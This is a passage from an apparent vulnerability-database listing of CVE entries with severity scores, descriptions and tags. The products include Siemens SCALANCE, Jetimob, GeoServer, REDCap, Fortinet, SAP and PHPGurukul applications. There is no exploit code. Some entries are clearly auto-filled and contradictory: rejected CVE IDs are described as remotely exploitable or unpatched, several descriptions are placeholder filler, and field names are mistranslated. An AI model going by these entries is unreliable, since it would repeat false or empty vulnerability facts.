(6GK5334-5TS01-2AR3) (All versions < V3.1), SCALANCE XRM334 (2x230 V AC, 12xFO) (6GK5334-3TS01-4AR3) (All versions < V3.1), SCALANCE XRM334 (2x230 V AC, 8xFO) (6GK5334-2TS01-4AR3) (All versions < V3.1), SCALANCE XRM334 (2x230V AC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-4AR3) (All versions < V3.1). Affected devices contain an incorrect authorization check vulnerability. This could allow an authenticated remote attacker with "guest" role to invoke an internal "do system" command which exceeds their privileges. This command allows the execution of certain low-risk actions, the most critical of which is clearing the local system log.
Siemens
Privilege Escalation
-
CVE-2024-41505
MEDIUM
CVSS 6.1
Jetimob Plataforma Imobiliária 20240627-0 is vulnerable to Cross Site Scripting (XSS) in the "Pessoas" (persons) section via the field "Profissão" (professor).
XSS
Imobiliaria
-
CVE-2024-41504
MEDIUM
CVSS 6.1
Jetimob Plataforma Imobiliária 20240627-0 is vulnerable to Cross Site Scripting (XSS). In the "Oportunidades" (opportunities) section of the application when creating or editing an "Atividade" (activity), the form field "Descrição" allows injection of JavaScript.
XSS
Imobiliaria
-
CVE-2024-41503
MEDIUM
CVSS 6.1
Jetimob Plataforma Imobiliária 20240627-0 is vulnerable to Cross Site Scripting (XSS) in the field "Título" (title) inside the filter Save option in the "Busca" (search) function.
XSS
Imobiliaria
-
CVE-2024-41502
MEDIUM
CVSS 6.1
Jetimob Plataforma Imobiliária 20240627-0 is vulnerable to Cross Site Scripting (XSS) via the form field "Observações" (observances) in the "Pessoas" (persons) section when creating or editing either a legal or a natural person.
XSS
Imobiliaria
-
CVE-2024-40625
MEDIUM
CVSS 5.5
GeoServer is an open source server that allows users to share and edit geospatial data. The Coverage REST API /workspaces/{workspaceName}/coveragestores/{storeName}/{method}.{format} allows attackers to upload files from a specified URL (where {method} equals 'url') with no restriction. This vulnerability is fixed in 2.26.0.
SSRF
Geoserver
-
CVE-2024-38524
MEDIUM
CVSS 5.3
GeoServer is an open source server that allows users to share and edit geospatial data. org.geowebcache.GeoWebCacheDispatcher.handleFrontPage(HttpServletRequest, HttpServletResponse) has no check to hide potentially sensitive information from users except for a hidden system property to hide the storage locations that defaults to showing the locations. This vulnerability is fixed in 2.26.2 and 2.25.6.
Information Disclosure
Geoserver
-
CVE-2024-37396
MEDIUM
CVSS 5.4
A stored cross-site scripting (XSS) vulnerability in the Calendar function of REDCap 13.1.9 allows authenticated users to execute arbitrary web script or HTML by injecting a crafted payload into the 'Notes' field of a calendar event. This could lead to the execution of malicious scripts when the event is viewed. Updating to version 14.2.1 or later is recommended to remediate this vulnerability.
XSS
Redcap
-
CVE-2024-37395
MEDIUM
CVSS 5.4
A stored cross-site scripting (XSS) vulnerability in the Public Survey function of REDCap 13.1.9 allows authenticated users to execute arbitrary web script or HTML by injecting a crafted payload into the 'Survey Title' and 'Survey Instructions' fields. This vulnerability could be exploited by attackers to execute malicious scripts when the survey is accessed through its public link. It is advised to update to version 14.2.1 or later to fix this issue.
XSS
Redcap
-
CVE-2024-37394
MEDIUM
CVSS 5.4
A stored cross-site scripting (XSS) vulnerability in the Project Dashboards of REDCap 13.1.9 allows authenticated users to execute arbitrary web script or HTML by injecting a crafted payload into the 'Dashboard title' and 'Dashboard content' text boxes. This can lead to the execution of malicious scripts when the dashboard is viewed. Users are recommended to update to version 14.2.1 or later to mitigate this vulnerability.
XSS
Redcap
-
CVE-2024-32119
MEDIUM
CVSS 4.8
A security vulnerability in Fortinet FortiClientEMS (CVSS 4.8). Remediation should follow standard vulnerability management procedures.
Fortinet
Authentication Bypass
Forticlientems
-
CVE-2023-48786
MEDIUM
CVSS 4.3
A server-side request forgery vulnerability [CWE-918] in Fortinet FortiClientEMS version 7.4.0 through 7.4.2 and before 7.2.6 may allow an authenticated attacker to perform internal requests via crafted HTTP or HTTPS requests.
Fortinet
SSRF
Forticlientems
-
CVE-2025-47096
LOW
CVSS 3.5
Adobe Experience Manager versions 6.5.22 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass, allowing a low impact to the integrity of the component. Exploitation of this issue requires user interaction in that a victim must interact with the malicious content. Low privileges are required.
Adobe
Authentication Bypass
-
CVE-2025-47095
LOW
CVSS 3.1
Rejected reason: This CVE ID was issued in error by its CVE Numbering Authority and does not represent a valid vulnerability. Rated low severity (CVSS 3.1), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.
Information Disclosure
-
CVE-2025-42990
LOW
CVSS 3.0
Unprotected SAPUI5 applications allow an attacker with basic privileges to inject malicious HTML code into a webpage, with the goal of redirecting users to an attacker-controlled URL. This issue could impact the integrity of the application. Confidentiality or Availability are not impacted.
XSS
-
CVE-2025-42988
LOW
CVSS 3.7
Under certain conditions, SAP Business Objects Business Intelligence Platform allows an unauthenticated attacker to enumerate HTTP endpoints in the internal network by specially crafting HTTP requests. This disclosure of information could further enable the researcher to cause SSRF. It has no impact on integrity and availability of the application.
Sap
SSRF
-
CVE-2025-36576
LOW
CVSS 2.7
Dell Wyse Management Suite, versions prior to WMS 5.2, contain a Cross-Site Request Forgery (CSRF) vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.
CSRF
SSRF
Dell
-
CVE-2025-22251
LOW
CVSS 3.1
CVE-2025-22251 is a security vulnerability (CVSS 3.1) that allows an unauthenticated attacker. Remediation should follow standard vulnerability management procedures.
Fortinet
Authentication Bypass
-
CVE-2025-5984
LOW
CVSS 3.5
A vulnerability has been found in SourceCodester Online Student Clearance System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Admin/add-fee.php. The manipulation of the argument txtamt leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-5976
LOW
CVSS 3.5
A vulnerability has been found in PHPGurukul Rail Pass Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/add-pass.php. The manipulation of the argument fullname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
PHP
XSS
-
CVE-2025-5974
LOW
CVSS 3.5
A vulnerability, which was classified as problematic, has been found in PHPGurukul Restaurant Table Booking System 1.0. Affected by this issue is some unknown functionality of the file /check-status.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-5973
LOW
CVSS 2.4
A vulnerability classified as problematic was found in PHPGurukul Restaurant Table Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add-table.php. The manipulation of the argument tableno leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-5972
LOW
CVSS 2.4
A vulnerability classified as problematic has been found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file /admin/manage-subadmins.php. The manipulation of the argument fullname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
PHP
XSS
-
CVE-2025-5970
LOW
CVSS 2.4
A vulnerability was found in PHPGurukul Restaurant Table Booking System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/add-subadmin.php. The manipulation of the argument fullname leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
PHP
XSS
-
CVE-2025-5945
None
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. No vendor patch available.
Information Disclosure
-
CVE-2025-4801
None
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. No vendor patch available.
Information Disclosure
-
CVE-2025-0036
LOW
CVSS 3.2
CVE-2025-0036 is a security vulnerability (CVSS 3.2). Remediation should follow standard vulnerability management procedures.
Information Disclosure
-
CVE-2024-55595
None
Rejected reason: Not used. No vendor patch available.
Information Disclosure
-
CVE-2023-29184
LOW
CVSS 3.2
An incomplete cleanup vulnerability [CWE-459] in FortiOS 7.2 all versions and before, and FortiProxy version 7.2.0 through 7.2.2 and before 7.0.8, allows a VDOM privileged attacker to add SSH key files on the system silently via crafted CLI requests.
Fortinet
Information Disclosure